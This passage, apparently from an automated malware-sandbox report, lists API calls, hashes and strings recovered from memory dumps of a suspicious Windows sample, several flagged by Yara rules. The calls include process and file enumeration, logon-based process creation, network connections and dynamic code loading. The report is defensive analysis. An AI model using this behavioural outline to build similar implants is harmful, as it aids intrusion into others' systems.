                            • Opcode ID: 25a1cade9d9a1ec90bc3a16f961ffc886d68abec4331356a4ef07da50ac2384b
                            • Instruction ID: 5537fc31ffa5fbb0ac09be44264f8c8655e5644c8ff41f871c4d478a3134d972
                            • Opcode Fuzzy Hash: 25a1cade9d9a1ec90bc3a16f961ffc886d68abec4331356a4ef07da50ac2384b
                            • Instruction Fuzzy Hash: 37119472601218FBD7208A669C49EFF7F7DDF89760F148026F90AD6180D670884186B0
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124711597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.4124700446.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.4124722740.0000000000403000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.4124733573.0000000000404000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.4124757842.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.4124769608.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_12.jbxd
                            Similarity
                            • API ID: File$CloseCreateHandleRead
                            • String ID:
                            • API String ID: 1035965006-0
                            • Opcode ID: de8e7562ff60837e5b68acacff60a59f894b3ed398b1beaf9885a2a007807793
                            • Instruction ID: 13578ad0072e5758c11d0cf9d06b5e6b01679b076f79182928bb53a60008478f
                            • Opcode Fuzzy Hash: de8e7562ff60837e5b68acacff60a59f894b3ed398b1beaf9885a2a007807793
                            • Instruction Fuzzy Hash: 811157B58083059FC700AF29C54835FBBF4EF84364F00892EE895973A2D3B989498FD6
                            APIs
                            • _malloc.LIBCMT ref: 00DB81C2
                              • Part of subcall function 00DC87FF: __FF_MSGBANNER.LIBCMT ref: 00DC8822
                              • Part of subcall function 00DC87FF: __NMSG_WRITE.LIBCMT ref: 00DC8829
                              • Part of subcall function 00DC87FF: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,00DD181E,00000000,00000001,00000000,?,00DCA834,00000018,00DE3700,0000000C,00DCA8C5), ref: 00DC8876
                            • _malloc.LIBCMT ref: 00DB81D2
                            • _memset.LIBCMT ref: 00DB81EF
                              • Part of subcall function 00DC8722: __lock.LIBCMT ref: 00DC8740
                              • Part of subcall function 00DC8722: ___sbh_find_block.LIBCMT ref: 00DC874B
                              • Part of subcall function 00DC8722: ___sbh_free_block.LIBCMT ref: 00DC875A
                              • Part of subcall function 00DC8722: HeapFree.KERNEL32(00000000,00000000,00DE35A0,0000000C,00DCD788,00000000,?,00DD181E,00000000,00000001,00000000,?,00DCA834,00000018,00DE3700,0000000C), ref: 00DC878A
                              • Part of subcall function 00DC8722: GetLastError.KERNEL32(?,00DD181E,00000000,00000001,00000000,?,00DCA834,00000018,00DE3700,0000000C,00DCA8C5,00000000,00000000,?,00DCD842,0000000D), ref: 00DC879B
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap_malloc$AllocateErrorFreeLast___sbh_find_block___sbh_free_block__lock_memset
                            • String ID:
                            • API String ID: 1561657895-0
                            • Opcode ID: 21c09f07a7fc623b024758759923ff1919fe7979f59a699eda9de8700b3a409b
                            • Instruction ID: de32f74f57f46cff3beaf29c09f2abf442923637fd7502bddcc99bb98b62617b
                            • Opcode Fuzzy Hash: 21c09f07a7fc623b024758759923ff1919fe7979f59a699eda9de8700b3a409b
                            • Instruction Fuzzy Hash: ACE06D3B601516B6CA22396AEC02FDE2E1ECF827F0F24402DF9095A181EE118901B6F9
                            APIs
                            • malloc.MSVCRT ref: 004017BB
                            • Sleep.KERNELBASE ref: 004017C9
                              • Part of subcall function 00401700: CreateFileA.KERNELBASE ref: 0040174D
                              • Part of subcall function 00401700: ReadFile.KERNELBASE ref: 0040177D
                              • Part of subcall function 00401700: CloseHandle.KERNEL32 ref: 0040178D
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124711597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.4124700446.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.4124722740.0000000000403000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.4124733573.0000000000404000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.4124757842.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.4124769608.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_12.jbxd
                            Similarity
                            • API ID: File$CloseCreateHandleReadSleepmalloc
                            • String ID: (0@
                            • API String ID: 4248373497-1619376425
                            • Opcode ID: 6845ea8dd48fab404a2061b438f8f23c871c7f7415dcaaf50ff1d80553ea92f3
                            • Instruction ID: c18dacc817dc4ff119a69da04305d567d0d6ae5b32f5fd65705d0832059cd44e
                            • Opcode Fuzzy Hash: 6845ea8dd48fab404a2061b438f8f23c871c7f7415dcaaf50ff1d80553ea92f3
                            • Instruction Fuzzy Hash: 9AF0F8B4A053009BC700EF7ADA8551ABBE8BB08345F41483DA684E7391D678D9008B1A
                            APIs
                            • InternetOpenA.WININET(00DB1572,00000003,00000000,00000000,00000000), ref: 00DB27C2
                            • InternetConnectA.WININET(?,?,00000000,00000000,00000003,00000000,00DEFFC4), ref: 00DB2809
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$ConnectOpen
                            • String ID:
                            • API String ID: 2790792615-0
                            • Opcode ID: bc5d1b1292c3f0a894aa750e7b114b9efee42ba26fc7c7c60338216f23b59ba3
                            • Instruction ID: 5e353c7e07c26f5a540faeb86b22f755710cfb2533c092586ffec43f39df2e5b
                            • Opcode Fuzzy Hash: bc5d1b1292c3f0a894aa750e7b114b9efee42ba26fc7c7c60338216f23b59ba3
                            • Instruction Fuzzy Hash: 9831C272590384FAEA313B61AC4AFFB3F29EB81B14F10502AF602DD1D1DE758A45C678
                            APIs
                            • WSAStartup.WS2_32(00000202,?), ref: 00DB2E8F
                            • WSACleanup.WS2_32 ref: 00DB2E99
                              • Part of subcall function 00DC8EDE: _doexit.LIBCMT ref: 00DC8EEA
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: CleanupStartup_doexit
                            • String ID:
                            • API String ID: 3413891862-0
                            • Opcode ID: 5b9e8fc7d34bea40ff451a5d89123b516c91c3fbdfe955e177f3adb29d39a447
                            • Instruction ID: ecfbd1b97adc84e6d1c8cb979d47dc273230d4655a03df8f9a9984fc56ff6b63
                            • Opcode Fuzzy Hash: 5b9e8fc7d34bea40ff451a5d89123b516c91c3fbdfe955e177f3adb29d39a447
                            • Instruction Fuzzy Hash: FD016171D41355D6D7186FB4BC467E47AA4FB06B10F04412BB105DA2D5DB708285CBB8
                            APIs
                            • WSAStartup.WS2_32(00000202,?), ref: 00DB2E8F
                            • WSACleanup.WS2_32 ref: 00DB2E99
                              • Part of subcall function 00DC8EDE: _doexit.LIBCMT ref: 00DC8EEA
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: CleanupStartup_doexit
                            • String ID:
                            • API String ID: 3413891862-0
                            • Opcode ID: 72f3096b343d7d08960cfb8a19a7e486d81590be9de46aa9126aa7b10bb28443
                            • Instruction ID: ecfbd1b97adc84e6d1c8cb979d47dc273230d4655a03df8f9a9984fc56ff6b63
                            • Opcode Fuzzy Hash: 72f3096b343d7d08960cfb8a19a7e486d81590be9de46aa9126aa7b10bb28443
                            • Instruction Fuzzy Hash: FD016171D41355D6D7186FB4BC467E47AA4FB06B10F04412BB105DA2D5DB708285CBB8
                            APIs
                            • _calloc.LIBCMT ref: 00DC0D3B
                              • Part of subcall function 00DD6990: __calloc_impl.LIBCMT ref: 00DD69A5
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: __calloc_impl_calloc
                            • String ID:
                            • API String ID: 2108883976-0
                            • Opcode ID: 05b948c874dc6b62188192750fbe821c3d408f1b7344a58cdf1efc24f4b1b5ee
                            • Instruction ID: 03b8fa163dcd1e1ce6e6bd9b29f3f4e6b10120fe73e4971ca5e0e286a6074a34
                            • Opcode Fuzzy Hash: 05b948c874dc6b62188192750fbe821c3d408f1b7344a58cdf1efc24f4b1b5ee
                            • Instruction Fuzzy Hash: 41A115B5900209EFDB219F94CC45FAEBBBAFF89300F208559F545AB261D7719A90DF20
                            APIs
                            • LoadLibraryA.KERNELBASE(?,?,?,?,?,?,00D79E14,AAAABBBB,?,?,?,?), ref: 00D7A36B
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: LibraryLoad
                            • String ID:
                            • API String ID: 1029625771-0
                            • Opcode ID: 921837ef3eb67de63abac7cb5666c735ab802cdd6b7f1449a49ae73ad87c3da8
                            • Instruction ID: 0f968b530b6514febcc110c2235b0197f593c47b9fef1f3f649f40f181776f33
                            • Opcode Fuzzy Hash: 921837ef3eb67de63abac7cb5666c735ab802cdd6b7f1449a49ae73ad87c3da8
                            • Instruction Fuzzy Hash: 0051B8B5A00119DFCF08CF98C890AAEB7B2FF88304F148159E9196B351D735AE51CFA5
                            APIs
                            • HeapDestroy.KERNEL32(?), ref: 00DBA874
                              • Part of subcall function 00DBC67F: _memset.LIBCMT ref: 00DBC69D
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: DestroyHeap_memset
                            • String ID:
                            • API String ID: 3970643317-0
                            • Opcode ID: f580c0153c6ea08a317772fc41a0e09d1e0d259b418286253bddedf0e48b1f1e
                            • Instruction ID: f365775e7db2f8078117058d30f962a18f8f913eaebfe52c106a6c2185ad93c1
                            • Opcode Fuzzy Hash: f580c0153c6ea08a317772fc41a0e09d1e0d259b418286253bddedf0e48b1f1e
                            • Instruction Fuzzy Hash: 7011A33A910205DFDB24AB2CD881EFE77A9EF11324F588026E40396951EB35DD83D6F6
                            APIs
                            • _malloc.LIBCMT ref: 00DC3EFE
                              • Part of subcall function 00DC87FF: __FF_MSGBANNER.LIBCMT ref: 00DC8822
                              • Part of subcall function 00DC87FF: __NMSG_WRITE.LIBCMT ref: 00DC8829
                              • Part of subcall function 00DC87FF: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,00DD181E,00000000,00000001,00000000,?,00DCA834,00000018,00DE3700,0000000C,00DCA8C5), ref: 00DC8876
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeap_malloc
                            • String ID:
                            • API String ID: 501242067-0
                            • Opcode ID: 770a5737fa1c2baebb51fc1048b2bd86ee1b0969124dc220f3e5ed95a16c1eaa
                            • Instruction ID: 9a4a4a641a33d025046202f2acab0d5c5cc38841d28dc9181b7c81ddade9565d
                            • Opcode Fuzzy Hash: 770a5737fa1c2baebb51fc1048b2bd86ee1b0969124dc220f3e5ed95a16c1eaa
                            • Instruction Fuzzy Hash: 6DE09A726086025FDB688E2DF841A16B7F19B85720B64CE3EE09AC7695DA3494819A24
                            APIs
                            • HeapCreate.KERNELBASE(00000000,00001000,00000000,?,00DCA3C6,00000001,?,?,?,00DCA53F,?,?,?,00DE36E0,0000000C,00DCA5FA), ref: 00DCA69F
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateHeap
                            • String ID:
                            • API String ID: 10892065-0
                            • Opcode ID: 2ffa34e97410b0011fdfa679f589b9e3d735e4620a10fc9987c1085e38182e29
                            • Instruction ID: 8991fdc93df828f2f6bf1f6248ad17d98383d56d780575a894759860fefca79d
                            • Opcode Fuzzy Hash: 2ffa34e97410b0011fdfa679f589b9e3d735e4620a10fc9987c1085e38182e29
                            • Instruction Fuzzy Hash: B7D05E725903499EEB106FB4BC09B223BDC9784799F158437B90CCA250E774D641D528
                            APIs
                            • VirtualAlloc.KERNELBASE(00000000,?,00003000,00D79DA8,?,00D79DA8,AAAABBBB), ref: 00D7A94F
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            • Opcode ID: 06db9e082881e3a7de2518e710500035fed678b226e83921418e753830c2cfca
                            • Instruction ID: 4444ce1b49823004aa5ed429690095b583c18930cd23931c15681bb5875c1e63
                            • Opcode Fuzzy Hash: 06db9e082881e3a7de2518e710500035fed678b226e83921418e753830c2cfca
                            • Instruction Fuzzy Hash: 3031BD70A00109EFCB08CF99C894AAEB7B5FF88314F14C159E919AB394D770AE51CF95
                            APIs
                            • Sleep.KERNELBASE(?,?,?,00DB16A0,?), ref: 00DB54FB
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: Sleep
                            • String ID:
                            • API String ID: 3472027048-0
                            • Opcode ID: 907562bb38f077f7c6f26acf487778ea9b24e02ba573ca1ab4b40f9f92c6591b
                            • Instruction ID: 35b38a3e5317b4ede47395129afeb6e9c34c6901bed16381d3c930d6e99748ef
                            • Opcode Fuzzy Hash: 907562bb38f077f7c6f26acf487778ea9b24e02ba573ca1ab4b40f9f92c6591b
                            • Instruction Fuzzy Hash: F5F0543641070AEBDF146B55FC457A43BA5FF05355F18413AE406C9269DB32C494CA75
                            APIs
                            • Sleep.KERNELBASE(?,00DEC1B4,?,00DB16A0,00DEC1B4), ref: 00DB54FB
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                             • Associated: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: Sleep
                            • String ID:
                            • API String ID: 3472027048-0
                            • Opcode ID: 9e31b146223353ee4fb2abb701a5df8a603abebe878e35761fae754d0049fb3e
                            • Instruction ID: 35b38a3e5317b4ede47395129afeb6e9c34c6901bed16381d3c930d6e99748ef
                            • Opcode Fuzzy Hash: 9e31b146223353ee4fb2abb701a5df8a603abebe878e35761fae754d0049fb3e
                            • Instruction Fuzzy Hash: F5F0543641070AEBDF146B55FC457A43BA5FF05355F18413AE406C9269DB32C494CA75
                            APIs
                              • Part of subcall function 00401805: GetTickCount.KERNEL32 ref: 0040180B
                              • Part of subcall function 00401805: sprintf.MSVCRT ref: 00401875
                              • Part of subcall function 00401805: CreateThread.KERNELBASE ref: 004018A9
                            • Sleep.KERNELBASE(?,00401386,?,0000165A,00401386), ref: 00402A09
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124711597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000000.00000002.4124700446.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.4124722740.0000000000403000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.4124733573.0000000000404000.00000008.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.4124757842.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.4124769608.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_12.jbxd
                            Similarity
                            • API ID: CountCreateSleepThreadTicksprintf
                            • String ID:
                            • API String ID: 2384577035-0
                            • Opcode ID: edd1f4d74f08d7a86e4d3b4e7046a0930fe99e0aed8f677c13492f49e07a44d4
                            • Instruction ID: afb1948537415933b36a4db080653cee2dd393a0534abb60b1e029c31af3872c
                            • Opcode Fuzzy Hash: edd1f4d74f08d7a86e4d3b4e7046a0930fe99e0aed8f677c13492f49e07a44d4
                            • Instruction Fuzzy Hash: 90D05EB1408704AAC6003FB5C90A71ABAA8AB05351F01063CF9C1251E1DF7950108B7B
                            APIs
                            • _malloc.LIBCMT ref: 00DB5237
                              • Part of subcall function 00DC87FF: __FF_MSGBANNER.LIBCMT ref: 00DC8822
                              • Part of subcall function 00DC87FF: __NMSG_WRITE.LIBCMT ref: 00DC8829
                              • Part of subcall function 00DC87FF: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,00DD181E,00000000,00000001,00000000,?,00DCA834,00000018,00DE3700,0000000C,00DCA8C5), ref: 00DC8876
                            • _memset.LIBCMT ref: 00DB5243
                              • Part of subcall function 00DB16CB: _malloc.LIBCMT ref: 00DB16D1
                              • Part of subcall function 00DB171B: htonl.WS2_32(0000001F), ref: 00DB1721
                            • _strncmp.LIBCMT ref: 00DB5292
                            • GetCurrentDirectoryA.KERNEL32(00004000,00000000), ref: 00DB52A0
                              • Part of subcall function 00DC8722: __lock.LIBCMT ref: 00DC8740
                              • Part of subcall function 00DC8722: ___sbh_find_block.LIBCMT ref: 00DC874B
                              • Part of subcall function 00DC8722: ___sbh_free_block.LIBCMT ref: 00DC875A
                              • Part of subcall function 00DC8722: HeapFree.KERNEL32(00000000,00000000,00DE35A0,0000000C,00DCD788,00000000,?,00DD181E,00000000,00000001,00000000,?,00DCA834,00000018,00DE3700,0000000C), ref: 00DC878A
                              • Part of subcall function 00DC8722: GetLastError.KERNEL32(?,00DD181E,00000000,00000001,00000000,?,00DCA834,00000018,00DE3700,0000000C,00DCA8C5,00000000,00000000,?,00DCD842,0000000D), ref: 00DC879B
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 00DB52D1
                            • GetLastError.KERNEL32 ref: 00DB52DE
                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00DB532A
                            • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00DB533A
                            • FindNextFileA.KERNEL32(00000000,00000010), ref: 00DB53CD
                            • FindClose.KERNEL32(00000000), ref: 00DB53DC
                              • Part of subcall function 00DB1825: _vwprintf.LIBCMT ref: 00DB182F
                              • Part of subcall function 00DB1825: _vswprintf_s.LIBCMT ref: 00DB1853
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: Time$FileFind$ErrorHeapLastSystem_malloc$AllocateCloseCurrentDirectoryFirstFreeLocalNextSpecific___sbh_find_block___sbh_free_block__lock_memset_strncmp_vswprintf_s_vwprintfhtonl
                            • String ID: %s$.\*$D0%02d/%02d/%02d %02d:%02d:%02d%s$F%I64d%02d/%02d/%02d %02d:%02d:%02d%s
                            • API String ID: 2804257087-1754256099
                            • Opcode ID: 89c83abd30822cac4ed41a2fc1cefeba8620565b8f7f31f714c5e024469829cd
                            • Instruction ID: fe9ed71b35b2c4b1b0e16ddbae8e82ec3d813c6d256df7658556778c6e803426
                            • Opcode Fuzzy Hash: 89c83abd30822cac4ed41a2fc1cefeba8620565b8f7f31f714c5e024469829cd
                            • Instruction Fuzzy Hash: 6C513EB6900229FACB10ABE5DC46EFFB7BCEF48754F440426F516E2181FA789A449770
                            APIs
                            • _memset.LIBCMT ref: 00DBA504
                              • Part of subcall function 00DB16CB: _malloc.LIBCMT ref: 00DB16D1
                            • GetCurrentProcess.KERNEL32 ref: 00DBA54F
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00DBA583
                            • Process32First.KERNEL32(00000000,?), ref: 00DBA5A5
                              • Part of subcall function 00DB171B: htonl.WS2_32(0000001F), ref: 00DB1721
                            • Process32Next.KERNEL32(00000000,00000128), ref: 00DBA688
                              • Part of subcall function 00DBA477: OpenProcessToken.ADVAPI32(?,00000008,?), ref: 00DBA484
                            • ProcessIdToSessionId.KERNEL32(?,?,00000002,00000000), ref: 00DBA629
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$Process32$CreateCurrentFirstNextOpenSessionSnapshotTokenToolhelp32_malloc_memsethtonl
                            • String ID: %s%d%d%s%s%d$%s%d%d$x64$x86
                            • API String ID: 3674674043-1833344708
                            • Opcode ID: d6a3fb1332c80a530f0cb4c6b72c72ab712afee1be651f790671b4078455f093
                            • Instruction ID: 2f28fedbba0dec205bc08bfc1c48d6060be0ed4a922f4ff937750d6f302497ab
                            • Opcode Fuzzy Hash: d6a3fb1332c80a530f0cb4c6b72c72ab712afee1be651f790671b4078455f093
                            • Instruction Fuzzy Hash: D35163B6900219EADF21BBA5CC46FEF77BCEF04754F140066F50AE2152EA349A858B71
                            APIs
                            • _malloc.LIBCMT ref: 00DBA71B
                              • Part of subcall function 00DC87FF: __FF_MSGBANNER.LIBCMT ref: 00DC8822
                              • Part of subcall function 00DC87FF: __NMSG_WRITE.LIBCMT ref: 00DC8829
                              • Part of subcall function 00DC87FF: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,00DD181E,00000000,00000001,00000000,?,00DCA834,00000018,00DE3700,0000000C,00DCA8C5), ref: 00DC8876
                            • __snprintf.LIBCMT ref: 00DBA72C
                            • FindFirstFileA.KERNEL32(00000000,00DB50C9,?,00DBA7FD,00DB50C9,?,Function_0000504D), ref: 00DBA739
                              • Part of subcall function 00DC8722: __lock.LIBCMT ref: 00DC8740
                              • Part of subcall function 00DC8722: ___sbh_find_block.LIBCMT ref: 00DC874B
                              • Part of subcall function 00DC8722: ___sbh_free_block.LIBCMT ref: 00DC875A
                              • Part of subcall function 00DC8722: HeapFree.KERNEL32(00000000,00000000,00DE35A0,0000000C,00DCD788,00000000,?,00DD181E,00000000,00000001,00000000,?,00DCA834,00000018,00DE3700,0000000C), ref: 00DC878A
                              • Part of subcall function 00DC8722: GetLastError.KERNEL32(?,00DD181E,00000000,00000001,00000000,?,00DCA834,00000018,00DE3700,0000000C,00DCA8C5,00000000,00000000,?,00DCD842,0000000D), ref: 00DC879B
                            • _malloc.LIBCMT ref: 00DBA778
                            • __snprintf.LIBCMT ref: 00DBA78D
                              • Part of subcall function 00DBA6D1: _malloc.LIBCMT ref: 00DBA6DC
                              • Part of subcall function 00DBA6D1: __snprintf.LIBCMT ref: 00DBA6F0
                            • FindNextFileA.KERNEL32(000000FF,00DB50C9,?,?,?,?,?,?,?), ref: 00DBA7BA
                            • FindClose.KERNEL32(000000FF,?,?,?,?,?,?,?), ref: 00DBA7C7
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find__snprintf_malloc$FileHeap$AllocateCloseErrorFirstFreeLastNext___sbh_find_block___sbh_free_block__lock
                            • String ID: %s\*
                            • API String ID: 1254174322-766152087
                            • Opcode ID: 13c30badbf75fe15fb98529e44810901c4bc1067a590880ef9cd38e24dc63871
                            • Instruction ID: fb09acfb4f580dd76f7bea67d60a680dc41548e64f19eaf298f440e4e6ab5ef9
                            • Opcode Fuzzy Hash: 13c30badbf75fe15fb98529e44810901c4bc1067a590880ef9cd38e24dc63871
                            • Instruction Fuzzy Hash: C021AF72500209FBDF116F258C45EAB3B69EF417A0F188029F805A7291EF718E51ABB1
                            APIs
                            • CreateProcessWithLogonW.ADVAPI32(00000002,00000000,?,C0330CC4,00000000,00DB4994,C3E8296A,83FFFFDB,74DEE010,00DB4ACB), ref: 00DB4795
                            • GetLastError.KERNEL32 ref: 00DB47A7
                            • _memset.LIBCMT ref: 00DB47F0
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateErrorLastLogonProcessWith_memset
                            • String ID: sysnative$system32
                            • API String ID: 2584212486-2461298002
                            • Opcode ID: 34e5995cc04eafa7ce9271aedd5918d8475104e375b68d3cfa7db0205f1da5c2
                            • Instruction ID: 3d888f660f52d5fcd4751560cb727e7f95d87dadc7a8119517935ea4b8eb6478
                            • Opcode Fuzzy Hash: 34e5995cc04eafa7ce9271aedd5918d8475104e375b68d3cfa7db0205f1da5c2
                            • Instruction Fuzzy Hash: 2F312D7A900251FFCB129F64AC09FE63BA9EF45310F184055F996DB252DB71D904C7B0
                            APIs
                            • CreateProcessWithLogonW.ADVAPI32(00000002,00000000,?,C0330CC4,00000000,00DB4994,C3E8296A,83FFFFDB,00DDB190,00DB4ACB), ref: 00DB4795
                            • GetLastError.KERNEL32 ref: 00DB47A7
                            • _memset.LIBCMT ref: 00DB47F0
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                             • Associated: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateErrorLastLogonProcessWith_memset
                            • String ID: sysnative$system32
                            • API String ID: 2584212486-2461298002
                            • Opcode ID: 6f9d7035524612a16483502095c16a172a2c917a4d495048557f653f2366b610
                            • Instruction ID: 3d888f660f52d5fcd4751560cb727e7f95d87dadc7a8119517935ea4b8eb6478
                            • Opcode Fuzzy Hash: 6f9d7035524612a16483502095c16a172a2c917a4d495048557f653f2366b610
                            • Instruction Fuzzy Hash: 2F312D7A900251FFCB129F64AC09FE63BA9EF45310F184055F996DB252DB71D904C7B0
                            APIs
                            • htonl.WS2_32 ref: 00DB86B6
                            • htons.WS2_32(?), ref: 00DB86C6
                            • socket.WS2_32(00000002,00000002,00000000), ref: 00DB86DC
                            • closesocket.WS2_32(00000000), ref: 00DB86E9
                            • bind.WS2_32(00000000,?,00000010), ref: 00DB8717
                            • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 00DB872E
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: bindclosesockethtonlhtonsioctlsocketsocket
                            • String ID:
                            • API String ID: 3910169428-0
